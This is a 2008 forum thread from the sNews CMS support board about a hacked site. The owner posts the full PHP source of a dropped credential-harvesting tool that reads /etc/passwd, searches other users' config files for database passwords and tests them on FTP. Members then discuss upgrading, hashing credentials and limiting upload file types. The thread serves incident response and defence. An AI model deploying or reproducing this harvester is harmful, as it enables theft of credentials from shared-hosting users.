Please login or register.

Login with username, password and session length
Advanced search  

Author Topic: Site hacked and phpconfigspy file left (sNews 1.5)  (Read 10060 times)

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Site hacked and phpconfigspy file left (sNews 1.5)
« on: March 04, 2008, 03:56:27 pm »

hey,

been a while since I posted in here, I did a site a while back using sNews 1.5 I think,
I had an issue recently where the hosting company changed/disabled the mysql_Pconnect I changed that to use mysql_connect and it seemed fine.

However today http://www.swcp.co.uk is now showing an error:

Warning: main(snews.php) [function.main]: failed to open stream: No such file or directory in /home/swcpweb/public_html/index.php on line 2

Have checked and in fact the file is missing!

There is also a file called news.php which from what I can tell is something called phpconfigspy - I'll post the contents - hope thats ok....

Just wondering on where i should go from here, I have a backup at home, but whats the best way of stopping this happeninng in the future and should i be checking the database for any odd data/backdoors.

Im suprised that they managed to upload and remove a file.

Any help/tips gratefull

thanks

ben
« Last Edit: March 05, 2009, 04:30:21 am by Joost »
Logged

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Re: Site hacked and phpconfigspy file left
« Reply #1 on: March 04, 2008, 03:57:41 pm »

Question - should I post the phpconfigspy file here - or does that in fact help spread this kind of *crap*
Logged

eriknorum

  • Jr. Member
  • **
  • Karma: 2
  • Posts: 78
Re: Site hacked and phpconfigspy file left
« Reply #2 on: March 04, 2008, 04:52:23 pm »

I donīt think posting the code here could do any harm. There are indeed some exploit for snews 1.5, see link http://www.google.se/search?q=snews+1.5+exploit&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:sv-SE:official&client=firefox-a
I guess upgrading would solve the hacking problem :)
Logged

Joost

  • Guest
Re: Site hacked and phpconfigspy file left
« Reply #3 on: March 04, 2008, 04:56:18 pm »

Yes, post it. We can always decide to remove it later. I am interested.
Logged

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #4 on: March 04, 2008, 05:45:25 pm »

Question - should I post the phpconfigspy file here - or does that in fact help spread this kind of *crap*
Yes, as Joost noted... please post it so we can have a look at it. It might help us learn what this hacker was up to.
NOTE... If your site installation was using sNews 1.5.30... that's why the invader succeeded. We Identitied and Patched this vulnerability rather quickly once it was discovered... with the release of 1.5.31. However... the best advice would be to upgrade your site by replacing the snews.php file with the 1.6 version... and making the change to the settings table in the database... which uses the MD5 hash for both the username and password (which 1.5.30 did not).
Logged
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Re: Site hacked and phpconfigspy file left
« Reply #5 on: March 04, 2008, 08:05:19 pm »

Code: [Select]
<?php
/*
Brainfuck
Edited by Braindrain
(c) http://p-range.info
*/
echo '<html><head><title>Brainfuck</title></head><body>';
(
$sm ini_get('safe_mode') == 0) ? $sm 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd fopen('/etc/passwd','r');
if (!
$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i 0;
while(!
feof($passwd))
{
$str fgets($passwd);
if ($i 35)
{
$pos strpos($str,':');
$username substr($str,0,$pos);
$dirz '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
  
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo 
"[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo 
"[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo 
"[~] Searching for passwords in config files...\n\n";
foreach (
$users as $user)
{
$path "/home/$user/public_html/";
read_dir($path,$user);
}
echo 
"\n[+] Done\n";
function 
read_dir($path,$username)
{
if ($handle opendir($path))
{
while (false !== ($file readdir($handle)))
{
$fpath "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
                         if (
                         
($file=='config.php')
                         or (
$file=='config.inc.php')
                         or (
$file=='conf.php')
                         or (
$file=='settings.php')
                         or (
$file=='configuration.php')
             or ($file=='wp_config.php')
             or ($file=='wp-config.php')
           or ($file=='inc.php')
                         or (
$file=='setup.php')
                         or (
$file=='dbconf.php')
                         or (
$file=='dbconfig.php')
                         or (
$file=='db.inc.php')
                         or (
$file=='dbconnect.php')
                         or (
$file=='connect.php')
                         or (
$file=='common.php')
                         or (
$file=='config_global.php')
                         or (
$file=='db.php')
                         or (
$file=='connect.inc.php')
                         or (
$file=='dbconnect.inc.php'))
                        {
$pass get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function 
get_pass($link)
{
@$config fopen($link,'r');
while(!feof($config))
{
$line fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass str_replace("]=\"","",$pass);
}

else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass str_replace("]='","",$pass);
return $pass[2];
}
}
}
function 
ftp_check($login,$pass)
{
@$ftp ftp_connect('127.0.0.1');
if ($ftp)
{
@$res ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass."  Success !\n";
}
else ftp_quit($ftp);
}
}
echo 
'</textarea><br><br>Coded by <b>$re@m3r</b> & <b>p-range</b>  <a href=http://p-range.info>p-range.info</a></body></html>';
?>
Logged

benjer

  • Newbie
  • *
  • Karma: 0
  • Posts: 20
Re: Site hacked and phpconfigspy file left
« Reply #6 on: March 04, 2008, 08:09:34 pm »

Actually I'm using sNews 1.4 and I made a fair few custom changes to it, so an easy upgrade is not really possible :(

I'm guessing that changing the include name from sNews to something random is a start, but will have to check the rest of the code for any vulns.

Luckily there are some very good internal tools at work (Yahoo), so I might run it through that - we even have a XSS checker written by rasmus so that could be interesting. I'm a front end web dev hence my small knowledge in this area.



Logged

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #7 on: March 04, 2008, 10:00:49 pm »

Thanks for posting the file Benjer. It is basically designed to search for a range of possible file-names where a username and password might be stored in... and if one of those files exists... the script then searches the file(s) for username & password variables or actual text by those names... and if the file-name isn't in the search array it checks any other existing file that may be in the root directory for the same stuff. It also tries to locate other things too. It's a fairly generic hack tool... so I'd imagine "brainf--k" is not an experienced hack-dork yet. Chances are he/she is in the learning phase... and yours was easy to crack.

The old 1.4 version has the username and password hard-coded into the snews.php file. In 1.5.30, the username and password were moved into a new (4th) settings table in the dbase along with some other site-wide settings. This was still vulnerable because the username was not hashed while the password was. From 1.5.31 on... both are hashed... and we haven't had hack invasions reported since. That's not to say that there isn't someone out there trying to get into 1.6... there mostly likely is.

There is no way to make your username and password absolutely 100% secure and non-retrievable. But there are ways to make it more difficult. The first is not using "login" as the path to your login panel. There are ways of making this obscure and unique... so that hackers won't find it using a sequential search function. I suggest it's time to move up to 1.6... re-do your mods... and take a look in the 1.6 Mods section for some extra notes on using a different login panel name.
« Last Edit: March 04, 2008, 10:04:04 pm by Keyrocks »
Logged
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU

funlw65

  • Hero Member
  • *****
  • Karma: 96
  • Posts: 771
    • Country Lab
Re: Site hacked and phpconfigspy file left
« Reply #8 on: March 19, 2008, 09:02:44 pm »

So, always safe_mode = on is better?
Logged

Joost

  • Guest
Re: Site hacked and phpconfigspy file left
« Reply #9 on: March 20, 2008, 03:22:33 am »

So, always safe_mode = on is better?

safe_mode works for php only and has some nasty side effects.  It is therefore not a great security measure.
Logged

funlw65

  • Hero Member
  • *****
  • Karma: 96
  • Posts: 771
    • Country Lab
Re: Site hacked and phpconfigspy file left
« Reply #10 on: March 22, 2008, 09:53:15 am »

Maybe another good solution is to permit uploading (with sNews) only txt,pdf,doc and images.
Logged

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #11 on: March 22, 2008, 03:59:42 pm »

Maybe another good solution is to permit uploading (with sNews) only txt,pdf,doc and images.

This is correct... if the hacker was able to get logged in and had access to the Files panel and used it to upload his/her malicious file.
In sNews 1.6... locate these strings near the bottom of your language variables array in snews.php. By default, all of the file-types in the value side of the strings are "Allowed". These are really important configuration variables, and anyone using the ME, MESU or MEMU packages will notice that they have been removed from the language variable array and added to a new array in a separate configuration file.

Remove anything you don't need or want to be uploaded and it will no  longer be available or allowed.

Code: [Select]
<?php

$l['file_include_extensions'] = 'php,txt,inc,htm,html'// list of file types available for inclusion routine
$l['allowed_files'] = 'php,htm,html,txt,inc,css,js,swf'// list of file types available for upload/file list routine
$l['allowed_images'] = 'gif,jpg,jpeg,png'// list of image types available for upload/file list routine
$l['ignored_items'] = '.,..,cgi-bin,.htaccess,Thumbs.db,snews.php,index.php,style.css'// list of files&folders ignored by upload/file list routine

?>

Logged
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU

funlw65

  • Hero Member
  • *****
  • Karma: 96
  • Posts: 771
    • Country Lab
Re: Site hacked and phpconfigspy file left
« Reply #12 on: March 22, 2008, 08:14:53 pm »

Thank you Keyrocks.
Logged

centered

  • Guest
Re: Site hacked and phpconfigspy file left
« Reply #13 on: March 24, 2008, 06:48:37 pm »

What is troubling is that it was hacked with 1.4.  I don't recall default 1.4 to use any of the username or password variables in that script....

Also the imgs folder is chmodded to 777, unless it is changed...
Logged

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6020
  • Semantically Challenged
    • snews.ca
Re: Site hacked and phpconfigspy file left
« Reply #14 on: March 24, 2008, 09:00:24 pm »

What is troubling is that it was hacked with 1.4.  I don't recall default 1.4 to use any of the username or password variables in that script....
Also the imgs folder is chmodded to 777, unless it is changed...

Benjer noted that he had a "fair few custom changes" made to his 1.4 package and wasn't too keen on upgrading to 1.6. He may (tho didn't say) have added the Bulk Files Uploader (one of my mods) to his site and that would have let a hacker upload a PHP file if restrictions weren't enabled to stop PHP files. But... we're only guessing at this point. Best to upgrade anyway.  :)
Logged
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU